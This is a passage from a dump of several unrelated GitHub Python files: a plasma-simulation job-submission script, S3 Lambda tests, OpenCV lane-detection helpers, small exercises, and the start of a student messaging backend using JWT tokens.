'tcv_63127_64x64_profiles_1.6e19.nc'\n\n # grids = ['newtcv_63127_64x64_profiles_22e19.nc',\n # 'newtcv_63161_64x64_profiles_22e19.nc']\n\n # grids = ['tcv_63161_64x64_profiles_8.9e19.nc',\n # 'tcv_63161_64x64_profiles_9.6e19.nc',\n # 'tcv_63161_64x64_profiles_10.2e19.nc',\n # 'tcv_63161_64x64_profiles_11e19.nc',\n # 'tcv_63161_64x64_profiles_12e19.nc']\n\n # grids = ['tcv_63127_64x64_profiles_9.9e19.nc',\n # 'tcv_63127_64x64_profiles_10.5e19.nc',\n # 'tcv_63127_64x64_profiles_11e19.nc',\n # 'tcv_63127_64x64_profiles_12e19.nc',\n # 'tcv_63127_64x64_profiles_13e19.nc']\n\n title = 'gauss'\n tme = '23:59:59'\n # tme = '00:19:59'\n nProcs = 512\n hermesVer = '/users/hm1234/scratch/hermes2/9Jan20/hermes-2'\n\n slabSim = slabSim('/users/hm1234/scratch/slabTCV', '2020runs',\n dateDir, 'BOUT5.inp', title=title)\n slabSim.setup()\n slabSim.modInp2('NOUT', 222)\n slabSim.modInp2('TIMESTEP', 111)\n slabSim.modInp2('ion_viscosity', 'false')\n slabSim.modInp2('hyper', 0.5, 148)\n # power of 3 still fast using fft but maybe more\n # robust to triangular instabilities)\n # slabSim.modInp2('nz', 243)\n # slabSim.modInp2('ny', 32, lineNum=18)\n # slabSim.modInp2('ramp_j_diamag', 1.0)\n slabSim.modJob(nProcs, hermesVer, tme)\n slabSim.subJob(shortQ=False)\n\n tme = '23:59:59'\n # runDir = '/users/hm1234/scratch/slabTCV/2020runs/slab-17-01-20_104716'\n runDir = '/users/hm1234/scratch/slabTCV/2020runs/gauss-24-01-20_155235'\n runDir = '/users/hm1234/scratch/slabTCV/2020runs/gauss-10-02-20_100102'\n runDir = 
'/users/hm1234/scratch/slabTCV/2020runs/gauss-14-02-20_153923'\n # res = restartSim(runDir,)\n # old = None\n # new = '2-hyper'\n # res.copyInpFiles(old, new)\n # res.copyRestartFiles(old, new, t=-10)\n # # res.modFile('output_ddt', 'true')\n # # res.modFile('NOUT', 200)\n # # res.modFile('TIMESTEP', 50)\n # # res.modFile('ion_viscosity', 'false')\n # res.modFile('ramp_j_diamag', 1.0)\n # res.modFile('hyper', 0.1, 148)\n # res.modJob(tme)\n # res.subJob()\n\n # runDir = '/users/hm1234/scratch/slabTCV/2020runs/sim-13-01-20_112202'\n # tme = '12:12:12'\n # addN = addNeutrals(runDir)\n # addType = '2-addN'\n # addN.copyInpFiles(addType=addType)\n # addN.copyRestartFiles(addType=addType)\n # # addN.copyNewInp(oldDir='/users/hm1234/scratch/newTCV',\n # # inpName='BOUT-2Dworks.inp')\n # addN.modFile('NOUT', 100)\n # addN.modFile('TIMESTEP', 2)\n # # addN.modFile('neutral_friction', 'true')\n # addN.modFile('type', 'mixed', lineNum=241)\n # addN.modJob(tme, optNodes=True)\n # addN.addVar(Nn=0.04, Pn=0.02)\n # addN.subJob()\n\n # grids = ['tcv_63127_64x64_profiles_1.6e19.nc',\n # 'tcv_63127_64x64_profiles_4.0e19.nc']\n\n grids = ['tcv_63161_128x64_profiles_1e19.nc',\n 'tcv_63161_128x64_profiles_2e19.nc',\n 'tcv_63161_128x64_profiles_3e19.nc',\n 'tcv_63161_128x64_profiles_4e19.nc',\n 'tcv_63161_128x64_profiles_5e19.nc',\n 'tcv_63161_128x64_profiles_6e19.nc',\n 'tcv_63161_128x64_profiles_7e19.nc',\n 'tcv_63161_128x64_profiles_8e19.nc',\n 'tcv_63161_128x64_profiles_9e19.nc',\n 'tcv_63161_128x64_profiles_10e19.nc']\n\n grids = ['tcv_63161_128x64_profiles_1e19.nc',\n 'tcv_63161_128x64_profiles_5e19.nc',\n 'tcv_63161_128x64_profiles_9e19.nc']\n\n grids = ['tcv_63161_extendedpsi_64x64_profiles_1e19.nc',\n 'tcv_63161_extendedpsi_64x64_profiles_3e19.nc',\n 'tcv_63161_extendedpsi_64x64_profiles_5e19.nc']\n\n # qgrids = ['tcv_63161_128x64_profiles_1e19.nc']\n\n # inpFile = 'BOUT2.inp'\n # title = 'expsi'\n # nProcs = 256\n # tme = '06:66:66'\n # gridSim = multiGridSim(pathOut, pathIn, dateDir, inpFile, grids, title)\n # gridSim.setup()\n # gridSim.modInp2('carbon_fraction', 0.04)\n # gridSim.modInp2('frecycle', 0.99)\n # gridSim.modInp2('NOUT', 444)\n # gridSim.modInp2('TIMESTEP', 222)\n # gridSim.modJob(nProcs, hermesVer, tme)\n # gridSim.subJob()\n\n # pathOut = '/users/hm1234/scratch/slabTCV/'\n # pathIn = 'test'\n # inpFile = 'BOUT2.inp'\n # nProcs = 192\n # tme = '00:11:11'\n # title = 'slab'\n # scanParams = [0.0]\n # sim1 = slabSim(pathOut, pathIn, dateDir, inpFile, scanParams, title)\n # sim1.setup()\n # sim1.modInp1('carbon_fraction')\n # # sim1.modInp2('carbon_fraction', 0.95)\n # # sim1.modInp2('ion_viscosity', 'true')\n # sim1.modInp2('NOUT', 444)\n # sim1.modInp2('TIMESTEP', 222)\n # # sim1.modInp2('carbon_fraction', 0.04)\n # sim1.modJob(nProcs, hermesVer, tme)\n # sim1.subJob(shortQ=True)\n\n # runDir = '/users/hm1234/scratch/TCV/NeScan2/NeScan-03-06-19_171145'\n # runDir = '/users/hm1234/scratch/TCV/NeScan2/frecycle-05-06-19_145457'\n # runDir = '/users/hm1234/scratch/TCV/longtime/cfrac-10-06-19_175728'\n # runDir = '/users/hm1234/scratch/TCV/longtime/rfrac-19-06-19_102728'\n # runDir = '/users/hm1234/scratch/TCV2/gridscan/grid-20-06-19_135947'\n # runDir = '/users/hm1234/scratch/newTCV/gridscan/grid-01-07-19_185351'\n # runDir = '/users/hm1234/scratch/newTCV/gridscan/test'\n runDir = '/users/hm1234/scratch/newTCV/turb-test/g-18-07-19_133047'\n runDir = '/users/hm1234/scratch/newTCV/scans/cfrac-23-07-19_163139'\n runDir = '/users/hm1234/scratch/newTCV/scans/rfrac-25-07-19_162302'\n runDir = 
'/users/hm1234/scratch/newTCV/gridscan/grid-07-09-19_180613'\n runDir = '/users/hm1234/scratch/newTCV/gridscan/grid-12-09-19_165234'\n # runDir = '/users/hm1234/scratch/newTCV/gridscan2/grid-13-09-19_153544'\n # runDir = '/users/hm1234/scratch/newTCV/gridscan2/grid-18-09-19_111405'\n runDir = '/users/hm1234/scratch/newTCV/gridscan2/grid-23-09-19_140426'\n # runDir = '/users/hm1234/scratch/newTCV/high_recycle/grid-25-09-19_165128'\n # runDir = '/users/hm1234/scratch/newTCV/high_density/grid-28-10-19_133357'\n # runDir = '/users/hm1234/scratch/newTCV/gridscan2/grid-07-11-19_154854'\n runDir = '/users/hm1234/scratch/newTCV/gridscan/grid-07-11-19_155631'\n runDir = '/users/hm1234/scratch/slabTCV/init/slab-25-11-19_143529'\n runDir = '/users/hm1234/scratch/newTCV2/hdscan/hdg-02-12-19_172620'\n runDir = '/users/hm1234/scratch/newTCV2/hdscan/expsi-04-12-19_203752'\n\n # tme = '06:66:33'\n # addN = addNeutrals(runDir)\n # addType = '2-addN'\n # addN.copyInpFiles(addType=addType)\n # addN.copyRestartFiles(addType=addType)\n # # addN.copyNewInp(oldDir='/users/hm1234/scratch/newTCV',\n # # inpName='BOUT-2Dworks.inp')\n # addN.modFile('NOUT', 555)\n # addN.modFile('TIMESTEP', 150)\n # # addN.modFile('neutral_friction', 'true')\n # addN.modFile('type', 'mixed', lineNum=229)\n # addN.modJob(tme)\n # addN.addVar(Nn=0.04, Pn=0.02)\n # addN.subJob()\n\n # tme = '06:66:66'\n # res = restartSim(runDir, scanIDs=[0])\n # old = '2-addN'\n # new = '2.2-addN'\n # res.copyInpFiles(old, new)\n # res.copyRestartFiles(old, new)\n # # res.modFile('adapt_source', 'false')\n # res.modJob(tme)\n # res.subJob()\n\n # res = restartSim(runDir, scanIDs=[0])\n # old = '2.1-resN'\n # new = '2.2-modSolver'\n # res.copyInpFiles(old, new)\n # res.copyRestartFiles(old, new)\n # # res.modFile('use_precon', 'false')\n # res.modFile('maxl', '5')\n # res.modJob(tme)\n # res.subJob()\n\n # tme = '23:59:59'\n # addN = addNeutrals(runDir)\n # addType = '2-addN2'\n # addN.copyInpFiles(addType=addType)\n # addN.copyRestartFiles(addType=addType)\n # # addN.copyNewInp(oldDir='/users/hm1234/scratch/newTCV',\n # # inpName='BOUT-2Dworks.inp')\n # addN.modFile('NOUT', 555)\n # addN.modFile('TIMESTEP', 150)\n # # addN.modFile('neutral_friction', 'true')\n # addN.modFile('type', 'mixed', lineNum=214)\n # addN.modFile('split_n0 ', 'true')\n # addN.modFile('split_n0_psi', 'true')\n # addN.modJob(tme)\n # addN.addVar(Nn=0.04, Pn=0.02)\n # addN.subJob()\n\n # tme = '1-23:59:59'\n # old = '2-addN'\n # new = '3.1-addC'\n # addC = addCurrents(runDir)\n # addC.copyInpFiles(old, new)\n # addC.copyRestartFiles(old, new)\n # addC.modFile('j_par', 'true')\n # addC.modFile('j_diamag', 'true')\n # # addC.modFile('split_n0 ', 'false')\n # # addC.modFile('split_n0_psi', 'false')\n # # addC.modFile('adapt_source', 'false')\n # addC.modFile('NOUT', 444) # 600\n # addC.modFile('TIMESTEP', 2) # 333\n # addC.modJob(tme, optNodes=True)\n # addC.subJob()\n\n # tme = '1-23:59:59'\n # old = '3-addC'\n # new = '4-addT'\n # addT = addTurbulence(runDir, scanIDs=[0])\n # newProcs = 512\n # addT.addTurb(old, new, npes=newProcs, MZ=256)\n # # addT.modFile('nz', 256)\n # addT.modFile('NOUT', 222)\n # addT.modFile('TIMESTEP', 5)\n # addT.modJob(tme=tme, nProcs=newProcs, optNodes=True)\n # addT.subJob()\n\n # tme = '1-23:59:59'\n # old = '3-addC'\n # new = '3.1-modPI'\n # addC = addCurrents(runDir, scanIDs=[0,1,2])\n # addC.copyInpFiles(old, new)\n # addC.copyRestartFiles(old, new)\n # addC.modFile('source_p', 1e-1)\n # addC.modFile('source_i', 1e-4)\n # # addC.modFile('split_n0 
', 'false')\n # # addC.modFile('split_n0_psi', 'false')\n # # addC.modFile('adapt_source', 'false')\n # # addC.modFile('NOUT', 500) # 600\n # # addC.modFile('TIMESTEP', 500) # 333\n # addC.modJob(tme)\n # addC.subJob()\n\n # addC = addCurrents(runDir)\n # addC.copyInpFiles(addType='2-addC')\n # addC.copyRestartFiles(addType='2-addC')\n # addC.modFile('j_par', 'true')\n # addC.modFile('j_diamag', 'true')\n # addC.modFile('TIMESTEP', 333)\n # addC.modJob(tme)\n # addC.subJob()\n\n # tme = '1-23:59:59'\n # old = '3-addC'\n # new = '3-resC'\n # resC = addCurrents(runDir)\n # resC.copyInpFiles(old, new)\n # resC.copyRestartFiles(old, new)\n # # addC.modFile('psi_')\n # resC.modFile('NOUT', 666)\n # resC.modFile('TIMESTEP', 444)\n # resC.modJob(tme)\n # resC.subJob()\n\n # tme = '1-23:59:59'\n # old = '3-resC3'\n # new = '4-addD'\n # addD = addCurrents(runDir)\n # addD.copyInpFiles(old, new)\n # addD.copyRestartFiles(old, new)\n # # addC.modFile('psi_')\n # addD.modFile('NOUT', 666)\n # addD.modFile('TIMESTEP', 444)\n # addD.modFile('pctype', 'hypre')\n # addD.modFile('neutral_gamma', 0.3, lineNum=218)\n # addD.modJob(tme)\n # addD.subJob()\n\n # tme = '1-23:59:59'\n # old = '3-addC2'\n # new = '4-split'\n # addC = addCurrents(runDir)\n # addC.copyInpFiles(old, new)\n # addC.copyRestartFiles(old, new)\n # addC.modFile('j_par', 'true')\n # addC.modFile('j_diamag', 'true')\n # addC.modFile('split_n0 ', 'true')\n # addC.modFile('split_n0_psi', 'true')\n # # addC.modFile('psi_')\n # addC.modFile('NOUT', 555)\n # addC.modFile('TIMESTEP', 55)\n # addC.modJob(tme)\n # addC.subJob()\n\n # tme = '23:55:55'\n # # addT = testTurbulence(runDir)\n # # addT.copyFiles2('3-addC', '4-addT')\n # # addT.modJob(tme)\n # addT = addTurbulence(runDir, scanIDs=[3])\n # addT.hermesVer = hermesVer\n # # addT.redistributeProcs('3-addC', '4-redistribute', 480)\n # # addT.addTurb('4-redistribute', '5-addT')\n # addT.addTurb('3-addC', '5-addT')\n # # addT.copyInpFiles('3-addC', '5-addT')\n # addT.copyNewInp(runDir, 'BOUT2.inp')\n # addT.modInp('grid')\n # addT.modFile('TIMESTEP', 0.002)\n # addT.modJob(tme)\n # addT.subJob()\n\n # addT = addTurbulence(runDir)\n # addT.copyInpFiles('3-addC', '4-addT')\n # addT.addTurb('3-addC', '4-addT')\n # addT.modJob(tme)\n # addT.modFile('MZ', 64)\n # addT.modFile('NOUT', 333)\n # addT.modFile('TIMESTEP', 0.04)\n # addT.modFile('output_ddt', 'true')\n # addT.modFile('verbose', 'true')\n # addT.subJob()\n","repo_name":"hahahasan/hermes-sim-tools","sub_path":"runJobs.py","file_name":"runJobs.py","file_ext":"py","file_size_in_byte":30601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13142372455","text":"import uvicorn\nfrom app.main import app\n\n\ndef prepare_host_structure(filename_uuid):\n filename_location = Path.cwd().joinpath('output', filename_uuid)\n input_location = Path.cwd().joinpath('input', filename_uuid)\n if not filename_location.is_dir():\n filename_location.mkdir(parents=True)\n if not input_location.is_dir():\n input_location.mkdir(parents=True)\n return\n\n\nif __name__ == '__main__':\n import sys\n\n if len(sys.argv) > 1:\n from pathlib import Path\n from uuid import uuid4\n from app.app_settings import UPLOAD_FOLDER\n from app.core.mapping_gen.mapping import start_mapping\n\n sourcefile = Path.cwd().joinpath(UPLOAD_FOLDER, sys.argv[1])\n targetfile = Path.cwd().joinpath(UPLOAD_FOLDER, sys.argv[2])\n filename_uuid: str = str(uuid4()).split('-')[0]\n prepare_host_structure(filename_uuid)\n\n status = 
start_mapping(sourcefile, targetfile, filename_uuid)\n print(status)\n else:\n uvicorn.run(app, host='127.0.0.1', port=5050, debug=True)\n","repo_name":"alexander-nemirovskiy/s2r_mapping_ui","sub_path":"s2r_mappings.py","file_name":"s2r_mappings.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13593305227","text":"from moto import mock_s3\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nfrom lambda2_data import lambda_handler\nimport boto3\n\n\n@mock_s3\ndef test_lambda_handler():\n s3 = boto3.resource('s3', region_name='us-east-1')\n s3.create_bucket(Bucket='landing-casas-09')\n s3.create_bucket(Bucket='casas-final-09')\n\n test_html = \"\"\"\n \n \n

    \n    Barrio 1    \n    $200,000    \n 3\n 2\n    100 mts2    \n    \n    \n    Barrio 2    \n    $300,000    \n 4\n 3\n    200 mts2    \n
    \n \n \n \"\"\"\n\n test_date = datetime.today().strftime('%Y-%m-%d')\n test_key = f'{test_date}.html'\n\n s3.Object('landing-casas-09', test_key).put(Body=test_html)\n\n response = lambda_handler(None, None)\n\n test_csv_key = f'{test_date}.csv'\n\n assert s3.Bucket('casas-final-09').Object(test_csv_key).get()['Body'].read().decode() == f\"FechaDescarga, Barrio, Valor, NumHabitaciones, NumBanos, mts2\\n{test_date}, Barrio 1, $200,000, 3, 2, inf\\n{test_date}, Barrio 2, $300,000, 3, inf, inf\\n\"\n assert response['statusCode'] == 200\n assert response['body'] == 'Archivo CSV generado con éxito.'\n\n\ndef test_lambda_handler_s3():\n s3 = boto3.client('s3')\n date = datetime.today().strftime('%Y-%m-%d')\n key = f'{str(date)}.html'\n obj = s3.get_object(Bucket='landing-casas-09', Key=key)\n body = obj['Body'].read()\n assert body is not None\n\n\ndef test_lambda_handler_soup():\n s3 = boto3.client('s3')\n date = datetime.today().strftime('%Y-%m-%d')\n key = f'{str(date)}.html'\n obj = s3.get_object(Bucket='landing-casas-09', Key=key)\n body = obj['Body'].read()\n soup = BeautifulSoup(body, 'html.parser')\n assert soup is not None\n","repo_name":"JuanCRodriguez20/ParcialBD","sub_path":"lambda2/test_lambda2_data.py","file_name":"test_lambda2_data.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71892635639","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nkLeftBottomGap = 120\nkLeftTopGap = 600\nkTopGap = 200\nresolution = [1280, 720]\noutputSize = [300, 600]\nleftTop = [kLeftTopGap,kTopGap]\nrightTop = [resolution[0]-kLeftTopGap,kTopGap]\nleftBottom = [kLeftBottomGap,resolution[1]]\nrightBottom = [resolution[0]-kLeftBottomGap,resolution[1]]\n\ndef changePerspective(img, draw=0):\n # LT, RT, LB, RB\n pts = [leftTop,rightTop,leftBottom,rightBottom]\n # pts = [[345,220],[468,220],[0,420],[750,420]] #Hardcoded values for our usecase\n if draw == 1:\n for point in pts:\n img = cv2.circle(img, point, 5, (0,255,0), -1)\n\n pts1 = np.float32(pts)\n pts2 = np.float32([[0,0],[outputSize[0],0],[0,outputSize[1]],[outputSize[0],outputSize[1]]])\n M = cv2.getPerspectiveTransform(pts1,pts2)\n dst = cv2.warpPerspective(img,M,outputSize)\n\n colour = (0, 255, 0)\n thickness = 3\n img = cv2.line(img, leftBottom, leftTop, colour, thickness)\n img = cv2.line(img, rightBottom, rightTop, colour, thickness)\n\n return img, dst\n\ndef convertBinary(image):\n img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n blur = cv2.blur(img,(5,5))\n thresh = cv2.threshold(blur,100,255,cv2.THRESH_BINARY)[-1]\n return thresh\n\ndef adaptiveThresholding(image, blur):\n if len(image.shape) != 2:\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n \n img = cv2.medianBlur(gray,blur)\n\n ret,th1 = cv2.threshold(img,127,255,cv2.THRESH_BINARY)\n th2 = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_MEAN_C,\\\n cv2.THRESH_BINARY,11,2)\n th3 = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\\\n cv2.THRESH_BINARY,11,2)\n\n return th2, th3\n\ndef colourThresholdingHSV(image):\n image = image[image.shape[0] - int(image.shape[0]/10):, :]\n image = cv2.pyrUp(image)\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n huL = 30\n huH = 179\n saL = 35\n saH = 255\n vaL = 0\n vaH = 255\n HSVLOW = np.array([huL, saL, vaL])\n HSVHIGH = np.array([huH, saH, vaH])\n\n # apply the range on a mask\n mask = cv2.inRange(hsv, HSVLOW, HSVHIGH)\n maskedFrame = cv2.bitwise_and(image, image, mask = mask)\n \n return 
maskedFrame, image\n\ndef getContours(image, maskedFrame):\n sizeL = 20**2\n sizeH = 450**2\n objColor = (0,0,255)\n marked = image.copy()\n ratio = 8\n start_dist = 1.5\n \n # Count the contours on masked frame\n kernel = np.ones((5,5),np.uint8)\n masked2 = cv2.dilate(maskedFrame, kernel, iterations = 1)\n masked = cv2.cvtColor(masked2, cv2.COLOR_BGR2GRAY)\n Contours, hierarchy = cv2.findContours(masked, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n rangeCount = 0\n\n for i in range (0, len(Contours)):\n cnt = Contours[i]\n x,y,w,h = cv2.boundingRect(cnt)\n area = cv2.contourArea(cnt)\n if sizeL < area < sizeH:\n distance = ratio - (y+h)*ratio/image.shape[0] + start_dist\n distance = \"{:.2f}\".format(distance)\n rangeCount = rangeCount + 1\n cv2.drawContours(marked, [cnt], -1, objColor, 3)\n marked = cv2.rectangle(marked, (x, y), (x+w, y+h), (255,255,255), 2)\n marked = cv2.putText(marked, str(distance), (x+w, y+h), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255), 2)\n\n return marked, rangeCount\n\ndef getCoords(event,x,y,flags,img):\n\n if event == cv2.EVENT_LBUTTONDBLCLK:\n print(x, y)\n cv2.circle(img,(x,y),3,(255,0,0),-1)\n\ndef centerLines(image):\n # image = cv2.rectangle(image, (0, int(image.shape[0]/2)), (image.shape[1], int(image.shape[0]/2)), (0,0,0), 2)\n # image = cv2.rectangle(image, (int(image.shape[1]/2), 0), (int(image.shape[1]/2), image.shape[0]), (0,0,0), 2)\n return image\n\n\n\nif __name__ == '__main__':\n pass","repo_name":"laukikk/Vision-Based-Navigator","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70726750201","text":"# The first two digits are the same and the last two digits are the same\n# The two pairs differ from each other, and the whole number is the square of some integer\n\ntemp = int(input(\"Enter the licence plate number\"))\nflag = 0 \nfor i in range(10):\n for j in range(10):\n '''enumerate the first two and the last two digits'''\n if i != j:\n '''only continue when they are different'''\n # accumulate by digit position; only the combined number can be tested with the square check\n k = 1000*i+100*i+10*j+j\n '''check whether k is the square of some integer, and print it if so'''\n # optimisation: start from 31, because the squares of numbers up to 30 have fewer than 4 digits\n for temp in range(31,100):\n if temp * temp == k:\n print(k)\n flag = 1\n break\n\n ","repo_name":"danyow-cheung/Algorithms_python","sub_path":"趣味算法/c1_traffic_accident.py","file_name":"c1_traffic_accident.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9921673120","text":"\"\"\"read people's names and marks from a text file and output the names of those who aren't within one standard deviation of the marks\r\nMichael field\r\n10 may 2014\"\"\"\r\n\r\ndef stdDev(marks, ave):\r\n stddev = 0\r\n \r\n for mark in marks:\r\n mark = eval(mark)\r\n stddev += (mark - ave)**2\r\n \r\n stddev = stddev/len(marks)\r\n stddev = stddev**0.5\r\n \r\n return stddev\r\n\r\nlines = []\r\n\r\nfile = input(\"Enter the marks filename:\\n\")\r\n\r\nf = open (file, \"r\")\r\n#insert each line into the lines array\r\nfor line in f:\r\n lines.append(line)\r\n\r\nf.close()\r\n\r\n#remove the \\n\r\nfor i in range(len(lines)):\r\n if i != len(lines)-1:\r\n lines[i] = lines[i][:-1]\r\n\r\nNameMark = []\r\nnames = []\r\nmarks = []\r\n\r\n#split names and marks\r\nfor line in lines:\r\n NameMark = line.split(\",\")\r\n names.append(NameMark[0])\r\n marks.append(NameMark[1])\r\n \r\n#calc the average\r\ntotal = 0\r\nfor mark in marks:\r\n total += eval(mark)\r\nave = total/len(marks)\r\n\r\nprint(\"The average is:\", '%.2f' % ave)\r\nsd = stdDev(marks, ave)\r\nprint(\"The std deviation is:\", '%.2f' % sd)\r\n\r\nif (ave-sd) != ave:\r\n 
print(\"List of students who need to see an advisor:\")\r\n\r\nfor pos in range(len(marks)):\r\n if eval(marks[pos]) < (ave-sd):\r\n print(names[pos])","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_9/fldmic006/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36402482414","text":"'''\nAuthors: \n Justin Wu, z5316037\n William Zheng, z5313015\n Alec Dudley-Bestow, z5260201\nDate: \n\n 25 March 2021\n'''\n\nfrom src.error import InputError, AccessError\nfrom src.auth import auth_register, check_token, get_data, write_data, check_u_id\nfrom src.channels import channels_create\nfrom src.channel import channel_id_valid, member_check, get_channel_index, user_is_owner_token, user_is_member, user_is_owner_uid, check_channel_id, check_is_member, update_user\nfrom datetime import datetime, timezone\nfrom src.other import insert_tag_notification\nimport threading\nimport time\nfrom src.helper import message_id_exists, message_id_generate, message_is_sender, message_too_long, \\\nsearch_message_id, owner_check, already_reacted, edit_react\n\nimport jwt\n\nSECRET = 'atotallysecuresecret'\nmessage_id_queue = [] #The reason to have this global variable is for the message_sendlater which requires\n#threading.Timer that can't return the variable from message_send\n\n\ndef update_message_stats(func):\n def wrap(*args, **kw):\n resp = func(*args, **kw)\n msgs_exist = 0\n data = get_data()\n for channel in data['channels']:\n msgs_exist += len(channel['messages'])\n data = update_user('messages_exist', msgs_exist, data)\n write_data(data)\n return resp\n return wrap\n\n@update_message_stats\ndef message_send(token, channel_id, message, **kw):\n '''\n Send a message from authorised_user to the channel specified by channel_id. \n Note: Each message should have it's own unique ID. \n I.E. 
No messages should share an ID with another message, \n even if that other message is in a different channel.\n Arguments:\n token (string) - JWT token encrypted with user's u_id and session_id.\n channel_id (int) - Id of inputted channel.\n message (string) - User's message to the specified channel.\n\n Exceptions:\n InputError - Message is more than 1000 characters.\n AccessError - When the authorised user has not joined the channel they are trying to post to.\n\n Return Value:\n Dictionary containing 'message_id'.\n ''' \n user_index = check_token(token)\n\n data = get_data()\n if not channel_id_valid(channel_id, data['channels']):\n raise InputError(description=\"Invalid channel id!\")\n \n message_too_long(message)\n \n # Decode token to get u_id\n token_structure = jwt.decode(token, SECRET, algorithms=['HS256'])\n u_id = token_structure['u_id']\n if not member_check(u_id, channel_id, data['channels']):\n raise AccessError(description=\"User is not a member of the channel!\")\n\n # Generate unique id for message\n message_id = message_id_generate()\n\n # Go to the channel and append the message and message_id\n channel_index = get_channel_index(channel_id)\n \n time = int(datetime.now().timestamp())\n data['channels'][channel_index]['messages'].append({\n 'message_id': message_id,\n 'u_id': u_id,\n 'message': message,\n 'time_created': time,\n 'is_pinned': False,\n 'reacts': [{\n 'react_id': 1,\n 'u_ids': [],\n 'is_this_user_reacted': False\n }]\n })\n\n user = data['users'][user_index]\n num_messages = user['messages_sent'][-1]['num_messages_sent']\n \n data['users'][user_index]['messages_sent'].append({\n 'num_messages_sent' : num_messages + 1,\n 'time_stamp' : datetime.now().timestamp()\n })\n write_data(data)\n insert_tag_notification(token, channel_id, message)\n #get the message_id for sendlater\n global message_id_queue\n message_id_queue.append(message_id) #For message_sendlater threading.Timer\n return {\n 'message_id': message_id,\n }\n\n@update_message_stats\ndef message_remove(token, message_id):\n ''' \n Given a message_id for a message, this message is removed from the channel/DM\n \n Parameters:\n token - Token for authorised user\n message_id - message id for message being removed\n\n Exceptions:\n InputError - Message (based on ID) no longer exists.\n AccessError - Message with message_id was not sent by the authorised user \n making this request.\n AccessError - The authorised user is not an owner of this channel (if it was sent \n to a channel) or the **Dreams**.\n\n Returns:\n None\n '''\n data = get_data()\n user_index = check_token(token)\n\n # Message doesn't exist\n message, channel = message_id_exists(message_id)\n if message is None:\n raise InputError(description=\"Invalid message id!\")\n\n # Message not sent by authorised user\n if message_is_sender(data['users'][user_index]['u_id'], message) == False:\n raise AccessError(description=\"Message with message_id was NOT sent by the authorised user making this request!\")\n\n # Auth user is not owner of channel or dreams\n # NOTE Function is imported from channel so not on this branch\n if user_is_owner_token(token, channel['channel_id']) == False:\n raise AccessError(description=\"The authorised user is an owner of this channel (if it was sent to a channel) or the **Dreams**!\")\n\n for ch in data['channels']:\n if ch['channel_id'] == channel['channel_id']:\n ch['messages'].remove(message)\n\n write_data(data)\n return {}\n\ndef message_edit(token, message_id, message):\n '''\n Given a message, update its text with 
new text. \n If the new message is an empty string, the message is deleted.\n\n Arguments:\n token (string) - JWT token encrypted with user's u_id and session_id.\n message_id (int) - Id of message to be edited.\n message (string) - Authorised user's message to the specified channel.\n\n Exceptions:\n InputError - Length of new message is over 1000 characters.\n InputError - Message_id refers to a deleted message.\n AccessError - Different user is trying to edit another user's message.\n AccessError - The user trying to edit their message is not an owner of the channel/dm.\n \n Return:\n None\n '''\n data = get_data()\n\n # InputError - Length of new message is over 1000 characters.\n message_too_long(message)\n\n check_token(token)\n token_structure = jwt.decode(token, SECRET, algorithms=['HS256'])\n auth_user_id = token_structure['u_id']\n\n # InputError - Message_id refers to a deleted message.\n channel_id, msg_index = search_message_id(message_id)\n channel_index = get_channel_index(channel_id)\n check_u_id(auth_user_id)\n\n # AccessError - The user trying to edit their message is not an owner of the channel/dm.\n owner_check(data['channels'][channel_index]['owner_members'], auth_user_id)\n\n # AccessError - Different user is trying to edit another user's message.\n u_id = data['channels'][channel_index]['messages'][msg_index]['u_id']\n if auth_user_id != u_id:\n raise AccessError(description=\"User trying to edit the message is not the auth user who made the message!\")\n\n # If given an empty string, delete the message and return early so the\n # removed entry is not written back below.\n if len(message) == 0:\n message_remove(token, message_id)\n return {\n }\n\n # Otherwise edit the old message.\n data['channels'][channel_index]['messages'][msg_index]['message'] = message\n \n write_data(data)\n return {\n }\n\n\ndef message_senddm(token, dm_id, message, **kw):\n '''\n Send a message from authorised_user to the DM specified by dm_id. Note: Each message should \n have its own unique ID. I.E. No messages should share an ID with another message, even if \n that other message is in a different channel or DM.\n\n Arguments:\n token (string) - JWT token encrypted with user's u_id and session_id.\n dm_id (int) - Id of inputted dm.\n message (string) - User's message to the specified channel.\n \n Exceptions:\n InputError - Length of new message is over 1000 characters.\n AccessError - When the authorised user is not a member of the DM they are trying to post to.\n \n Return Value:\n Dictionary containing 'message_id'.\n '''\n dm_msg_id = message_send(token, dm_id, message)['message_id']\n\n return {\n 'message_id': dm_msg_id\n }\n\ndef message_share(token, og_message_id, message, channel_id, dm_id):\n '''\n Given a message_id, auth_user will share this message to a channel or dm. \n If an optional message is given, it is added in addition to the originally shared message.\n\n Arguments:\n token (string) - JWT token encrypted with user's u_id and session_id.\n og_message_id (int) - Id of the original message. 
